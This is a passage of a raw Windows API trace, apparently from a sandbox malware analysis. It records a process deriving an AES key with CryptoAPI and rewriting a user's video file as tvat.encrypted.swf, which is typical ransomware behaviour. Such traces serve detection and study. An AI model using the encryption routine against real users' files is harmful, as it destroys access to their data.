HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa8f0da0, ftCreationTime.dwHighDateTime=0x1d5c44f, ftLastAccessTime.dwLowDateTime=0x23ba0970, ftLastAccessTime.dwHighDateTime=0x1d5bc83, ftLastWriteTime.dwLowDateTime=0x23ba0970, ftLastWriteTime.dwHighDateTime=0x1d5bc83, nFileSizeHigh=0x0, nFileSizeLow=0xa3d6, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="tvat.swf", cAlternateFileName="")) returned 0x7c2100 [0043.992] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0043.993] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.993] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.993] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.993] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.993] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0043.993] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.993] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0043.993] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.993] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.993] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0043.993] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.993] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.993] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.993] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.993] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.993] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0043.993] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.993] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0043.994] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.994] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.994] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0043.994] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.994] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.995] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.995] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.995] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.995] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.995] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.995] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.995] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.995] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.995] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.995] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.995] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0043.995] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.995] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.995] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.995] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.995] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.995] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.995] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.995] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.995] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.995] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.995] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.996] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.996] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.996] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.996] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.996] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.996] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.996] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0043.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.996] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0043.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.996] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.996] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.996] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.996] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0043.997] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.997] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.997] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.997] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.997] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.997] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.997] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.997] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.997] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0043.997] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.997] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.997] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.997] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.997] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.997] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.997] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0043.997] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.997] CryptDestroyHash (hHash=0x7c2240) returned 1 [0043.997] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.997] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.000] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.000] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.000] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.000] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\tvat.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0044.000] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.000] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0044.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0044.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0044.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0044.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0044.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0044.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0044.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0044.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0044.000] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0044.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0044.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0044.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0044.001] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0044.001] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0044.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0044.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0044.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0044.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0044.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0044.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0044.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0044.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0044.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0044.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0044.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0044.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0044.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0044.002] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b")) returned 0x10 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0044.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0044.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0044.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0044.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0044.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0044.003] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.encrypted.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\tvat.encrypted.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0044.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0044.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0044.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0044.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0044.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0044.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0044.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0044.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0044.003] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0044.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0044.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0044.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0044.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0044.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0044.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0044.003] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0044.003] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 